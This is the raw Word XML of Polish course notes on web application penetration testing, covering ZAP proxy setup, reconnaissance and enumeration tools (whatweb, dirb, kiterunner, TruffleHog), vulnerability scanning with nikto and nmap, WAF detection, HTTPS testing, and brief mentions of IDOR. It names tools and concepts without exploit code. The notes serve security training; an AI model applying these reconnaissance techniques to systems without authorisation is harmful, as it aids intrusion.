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FDEC" w14:textId="7C12F5D1" w:rsidR="00B30E12" w:rsidRPr="00B30E12" w:rsidRDefault="00CB5E3E" w:rsidP="00D43A57">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>Fundamenty teoretyczne</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174113F0" w14:textId="6A25B4B6" w:rsidR="009D65C7" w:rsidRDefault="009D65C7" w:rsidP="009D65C7">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP i jego przydatne projekty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B691013" w14:textId="52D2F10F" w:rsidR="0015079A" w:rsidRDefault="00E21835" w:rsidP="00514E8B">
      <w:r w:rsidRPr="00E21835">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E665ADA" wp14:editId="74077B5E">
            <wp:extent cx="3816769" cy="28511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790" cy="28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84A1" w14:textId="064F6DAB" w:rsidR="00F02D33" w:rsidRDefault="00687AA4" w:rsidP="00514E8B">
      <w:r w:rsidRPr="00687AA4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="795934EF" wp14:editId="5008B934">
            <wp:extent cx="3638550" cy="1483174"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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338" cy="1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524" w14:textId="1FB6FBB6" w:rsidR="00DF7425" w:rsidRDefault="006F0621" w:rsidP="00514E8B">
      <w:r w:rsidRPr="006F0621">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34199165" wp14:editId="3B1E8278">
            <wp:extent cx="3625850" cy="870891"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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154" cy="8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22D3" w14:textId="1ED23EBE" w:rsidR="00267FE6" w:rsidRDefault="00FF7FA3" w:rsidP="00FF7FA3">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Przeglądanie i modyfikacja ruchu http z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3867336C" w14:textId="2A6C77B6" w:rsidR="00C76D4A" w:rsidRDefault="004E119D" w:rsidP="00FB450F">
      <w:r>
        <w:t xml:space="preserve">Import certyfikatu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zapa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A83658">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544039E9" w14:textId="29E0AB4C" w:rsidR="00A83658" w:rsidRDefault="00A83658" w:rsidP="00FB450F">
      <w:r>
        <w:t xml:space="preserve">Krok 1: Tools -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Options</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dynamic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SSL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Certificates</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Certificates</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) -&gt; zapisz certyfikat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF64534" w14:textId="12A942AB" w:rsidR="004E119D" w:rsidRDefault="00A83658" w:rsidP="00FB450F">
      <w:r>
        <w:t xml:space="preserve">Krok 2: </w:t>
      </w:r>
      <w:r w:rsidR="00FB33BF">
        <w:t xml:space="preserve">Przeglądarka -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB33BF">
        <w:t>Settings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FB33BF">
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FB33BF">
        <w:t>Certificates</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F69C0">
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F69C0">
        <w:t>View</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F69C0">
        <w:t xml:space="preserve"> -&gt; Import</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BDB5C4" w14:textId="4C7D270B" w:rsidR="005C0F94" w:rsidRDefault="00445DD8" w:rsidP="00445DD8">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t>Rekonesans i enumeracja web aplikacji</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723A5053" w14:textId="77DF6BB7" w:rsidR="00621D08" w:rsidRDefault="00621D08" w:rsidP="00621D08"/>
    <w:p w14:paraId="5A222958" w14:textId="77777777" w:rsidR="00621D08" w:rsidRPr="00621D08" w:rsidRDefault="00621D08" w:rsidP="00621D08"/>
    <w:p w14:paraId="28F4EA09" w14:textId="143DA572" w:rsidR="00445DD8" w:rsidRDefault="00445DD8" w:rsidP="00621D08">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Stos technologiczny</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C00B5C5" w14:textId="20C8E24A" w:rsidR="00621D08" w:rsidRDefault="00C9606F" w:rsidP="00621D08">
      <w:r w:rsidRPr="00C9606F">
        <w:t xml:space="preserve">Pierwszym aspektem są artefakty w kodzie źródłowym strony. Przykładowo nazwy użytych bibliotek JavaScript (np. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t>jQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t xml:space="preserve">) czy pewne typowe kawałki kodu HTML doklejane przez różne </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t>frameworki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t>back-endowe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t xml:space="preserve"> (np. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t>token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t xml:space="preserve"> CSRF typowy dla aplikacji </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t>Ruby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t>Rails</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C9606F">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559DE1BC" w14:textId="3BF1C882" w:rsidR="00C9606F" w:rsidRDefault="00C9606F" w:rsidP="00621D08">
      <w:r w:rsidRPr="00C9606F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20940167" wp14:editId="690690E6">
            <wp:extent cx="5220152" cy="845893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EDDB" w14:textId="050318E3" w:rsidR="00C9606F" w:rsidRDefault="00DD6413" w:rsidP="00621D08">
      <w:r w:rsidRPr="00DD6413">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52E1FC4E" wp14:editId="42990FE2">
            <wp:extent cx="1737511" cy="1158340"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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7063" w14:textId="4928C06C" w:rsidR="00DD6413" w:rsidRDefault="00DD6413" w:rsidP="00621D08">
      <w:r>
        <w:t xml:space="preserve">Nagłówek X-Powered-By oznacza, że web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> korzysta z PHP</w:t>
      </w:r>
      <w:r w:rsidR="00F95E06">
        <w:t xml:space="preserve">, plus wskazanie na </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F95E06">
        <w:t>debiana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F95E06">
        <w:t xml:space="preserve"> (możliwe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6AC0AF" w14:textId="11672C70" w:rsidR="00414538" w:rsidRDefault="00414538" w:rsidP="00621D08">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73959257" wp14:editId="68EAD118">
            <wp:extent cx="3688080" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="762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7757" w14:textId="7CAE2A33" w:rsidR="00414538" w:rsidRDefault="00414538" w:rsidP="00621D08">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ngcontent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – może wskazywać na </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>angulara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4095E41C" w14:textId="08EE6D3C" w:rsidR="0016249E" w:rsidRDefault="0016249E" w:rsidP="00621D08">
      <w:r>
        <w:t xml:space="preserve">Narzędzie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wappalyzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – służy do identyfikacji stosu technologicznego aplikacji webowej</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE147CD" w14:textId="75C4CFB9" w:rsidR="00BE4C76" w:rsidRDefault="00BE4C76" w:rsidP="00621D08">
      <w:r w:rsidRPr="00BE4C76">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06085504" wp14:editId="5CF180D8">
            <wp:extent cx="1737360" cy="1895942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2413" cy="19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F541" w14:textId="703B899E" w:rsidR="007D0506" w:rsidRDefault="007D0506" w:rsidP="00621D08">
      <w:r>
        <w:t xml:space="preserve">Narzędzie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whatweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - służy do identyfikacji stosu technologicznego aplikacji webowej</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FC5B72" w14:textId="43ED37BA" w:rsidR="007D0506" w:rsidRDefault="007D0506" w:rsidP="00621D08">
      <w:r w:rsidRPr="007D0506">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E7FC4E4" wp14:editId="71320D97">
            <wp:extent cx="3403600" cy="602217"/>
            <wp:effectExtent l="0" t="0" r="6350" b="762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460" cy="6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2684" w14:textId="624A189C" w:rsidR="00445DD8" w:rsidRDefault="00445DD8" w:rsidP="00621D08">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kod źródłowy strony i jego sekrety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F14E7" w14:textId="0A2DBE58" w:rsidR="00621D08" w:rsidRDefault="000452C2" w:rsidP="00445DD8">
      <w:r>
        <w:t xml:space="preserve">Narzędzie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Truffle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Hog – poszukiwanie sekretów w kodzie źródłowym strony</w:t>
      </w:r>
      <w:r w:rsidR="009135E5">
        <w:t xml:space="preserve"> ( </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="009135E5" w:rsidRPr="00E34A56">
          <w:rPr>
            <w:rStyle w:val="Hipercze"/>
          </w:rPr>
          <w:t>https://trufflesecurity.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009135E5">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE45E3" w14:textId="24F1C1E7" w:rsidR="00445DD8" w:rsidRDefault="00445DD8" w:rsidP="00621D08">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Mapowanie punktów końcowych web aplikacji</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A8888B" w14:textId="4C32BC68" w:rsidR="00621D08" w:rsidRDefault="004F3E5F" w:rsidP="00445DD8">
      <w:r w:rsidRPr="004F3E5F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34BF2096" wp14:editId="5F27605B">
            <wp:extent cx="5760720" cy="9271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3E7" w14:textId="76A4BCB0" w:rsidR="005E3545" w:rsidRDefault="005E3545" w:rsidP="00445DD8">
      <w:r>
        <w:t xml:space="preserve">Funkcjonalności </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Zapa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E7ADF1" w14:textId="014D4E5A" w:rsidR="005E3545" w:rsidRDefault="005E3545" w:rsidP="005E3545">
      <w:pPr>
        <w:pStyle w:val="Akapitzlist"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DC3770A" w14:textId="2B103349" w:rsidR="005E3545" w:rsidRDefault="005E3545" w:rsidP="005E3545">
      <w:pPr>
        <w:pStyle w:val="Akapitzlist"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="278C5375" w14:textId="2C683661" w:rsidR="005E3545" w:rsidRDefault="005E3545" w:rsidP="005E3545">
      <w:pPr>
        <w:pStyle w:val="Akapitzlist"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Active </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34FAEA86" w14:textId="195EB20C" w:rsidR="00612F27" w:rsidRDefault="00DB093A" w:rsidP="00612F27">
      <w:r>
        <w:t>Narzędzie</w:t>
      </w:r>
      <w:r w:rsidR="001614D0">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00612F27">
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3ED30E0D" w14:textId="7BCF0C8A" w:rsidR="00EA4E54" w:rsidRDefault="00EA4E54" w:rsidP="00EA4E54">
      <w:r w:rsidRPr="00EA4E54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44584017" wp14:editId="089F99E9">
            <wp:extent cx="4526672" cy="381033"/>
            <wp:effectExtent l="0" t="0" r="762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D35" w:rsidRPr="00586D35">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5120F32E" wp14:editId="781E1F06">
            <wp:extent cx="3703641" cy="1249788"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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F176" w14:textId="0F77A6B8" w:rsidR="00AF41D8" w:rsidRDefault="00AF41D8" w:rsidP="00EA4E54">
      <w:r>
        <w:t xml:space="preserve">Narzędzie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kiterunner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – posiada listy plików, katalogów, końcówek </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58F8B027" w14:textId="7F669096" w:rsidR="00445DD8" w:rsidRDefault="00445DD8" w:rsidP="00621D08">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Specjalne pliki na serwerze</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC5D1E4" w14:textId="75A569D7" w:rsidR="00586D35" w:rsidRPr="00586D35" w:rsidRDefault="00586D35" w:rsidP="00586D35">
      <w:r w:rsidRPr="00586D35">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65DA4C26" wp14:editId="02A82F24">
            <wp:extent cx="1760373" cy="1310754"/>
            <wp:effectExtent l="0" t="0" r="0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EDAC" w14:textId="77777777" w:rsidR="00586D35" w:rsidRDefault="00586D35" w:rsidP="00586D35">
      <w:pPr>
        <w:pStyle w:val="NormalnyWeb"/>
      </w:pPr>
      <w:r>
        <w:t>źle skonfigurowany dostęp do pliku .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> może upublicznić konfigurację web serwera, a w najgorszym przypadku parę </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login:hasło</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do innych zasobów.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ECAE03" w14:textId="77777777" w:rsidR="00586D35" w:rsidRDefault="00586D35" w:rsidP="00586D35">
      <w:pPr>
        <w:pStyle w:val="NormalnyWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Natomiast plik security.txt jest artefaktem standardu o tej samej nazwie. W tym pliku web aplikacja powinna listować punkty kontaktowe do działu bezpieczeństwa w tym ewentualne kluczyki PGP oraz politykę bezpieczeństwa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED2704" w14:textId="7C4391EB" w:rsidR="00621D08" w:rsidRDefault="00621D08" w:rsidP="00445DD8"/>
    <w:p w14:paraId="4741E399" w14:textId="77777777" w:rsidR="00946190" w:rsidRDefault="00946190" w:rsidP="00445DD8"/>
    <w:p w14:paraId="507DC933" w14:textId="34FEA257" w:rsidR="00445DD8" w:rsidRDefault="00445DD8" w:rsidP="00621D08">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Podstawowy skan podatności web serwera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A6B966" w14:textId="4603C92A" w:rsidR="00621D08" w:rsidRDefault="002275D2" w:rsidP="00445DD8">
      <w:r>
        <w:t xml:space="preserve">Narzędzie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4924B4" w14:textId="0DA51BF3" w:rsidR="004E7DC5" w:rsidRDefault="004E7DC5" w:rsidP="00445DD8">
      <w:r>
        <w:t xml:space="preserve">Skanowanie podatności za pomocą </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EB151EE" w14:textId="0096BA3A" w:rsidR="002275D2" w:rsidRDefault="00787C28" w:rsidP="00445DD8">
      <w:r w:rsidRPr="00787C28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F8C73D6" wp14:editId="3A449E34">
            <wp:extent cx="2758679" cy="167655"/>
            <wp:effectExtent l="0" t="0" r="381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B2E" w14:textId="3D70EA74" w:rsidR="00585A17" w:rsidRDefault="00585A17" w:rsidP="00445DD8">
      <w:r>
        <w:t xml:space="preserve">Skan podatności </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmapem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> i skryptem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulners</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> można zrobić za pomocą narzędzia FLAN SCAN od </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cloudflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FDF4B9E" w14:textId="1482ABF0" w:rsidR="00946190" w:rsidRDefault="00946190" w:rsidP="00445DD8">
      <w:r>
        <w:t xml:space="preserve">Darmowy odpowiednik </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nessusa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Openwas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60D01F49" w14:textId="5E9A0E9E" w:rsidR="00621D08" w:rsidRDefault="00445DD8" w:rsidP="00E7300D">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Potrójna ściana ognia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572FA554" w14:textId="54C8783D" w:rsidR="00E7300D" w:rsidRPr="00E7300D" w:rsidRDefault="00E7300D" w:rsidP="00E7300D">
      <w:r>
        <w:t xml:space="preserve">Bezpłatny </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modsecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52B69019" w14:textId="276018A1" w:rsidR="0074293B" w:rsidRDefault="0074293B" w:rsidP="00445DD8">
      <w:r>
        <w:t xml:space="preserve">Narzędzie: wafw00f - Identyfikacja obecności </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>waf’a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="470068D8" w14:textId="70C020D4" w:rsidR="00621D08" w:rsidRDefault="00445DD8" w:rsidP="00A2006D">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Kanał komunikacyjny i jego bezpieczeństwo na przykładzi</w:t>
      </w:r>
      <w:r w:rsidR="00AC1ACA">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A37FAB" w14:textId="1D32C9A5" w:rsidR="00445DD8" w:rsidRDefault="004E12F9" w:rsidP="00445DD8">
      <w:r w:rsidRPr="004E12F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B7B6A2E" wp14:editId="3AFF572D">
            <wp:extent cx="3937000" cy="1955481"/>
            <wp:effectExtent l="0" t="0" r="6350" b="698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6774" cy="19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DF5" w14:textId="2E25CCAE" w:rsidR="00A12895" w:rsidRDefault="00A12895" w:rsidP="00445DD8">
      <w:r>
        <w:t>Narzędzia do testowania https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A091F" w14:textId="6B2B53A4" w:rsidR="00A12895" w:rsidRDefault="00A12895" w:rsidP="00A12895">
      <w:pPr>
        <w:pStyle w:val="Akapitzlist"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ssllabs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> od </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Qualys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E42C0">
        <w:t xml:space="preserve"> (upublicznia wyniki)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CE6D46" w14:textId="228D7E70" w:rsidR="00A12895" w:rsidRDefault="009E42C0" w:rsidP="00A12895">
      <w:pPr>
        <w:pStyle w:val="Akapitzlist"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sslscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F92DE2">
        <w:t xml:space="preserve">– z poziomu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F92DE2">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="293844DD" w14:textId="2A0D7549" w:rsidR="00827563" w:rsidRDefault="00E207F4" w:rsidP="00E207F4">
      <w:pPr>
        <w:pStyle w:val="Nagwek1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kontrola dostępu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E16E19E" w14:textId="2B8E1059" w:rsidR="000F17B0" w:rsidRDefault="002D0E4A" w:rsidP="00E207F4">
      <w:r>
        <w:t>IDOR – podmiana par</w:t>
      </w:r>
      <w:r w:rsidR="00EA4DBD">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>metru np. faktury</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECCEA4E" w14:textId="60552A92" w:rsidR="00261767" w:rsidRDefault="00BB6799" w:rsidP="00261767">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Throttling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="007211D0">
        <w:t>spowolnienie ataku automatycznego</w:t>
      </w:r>
    </w:p>
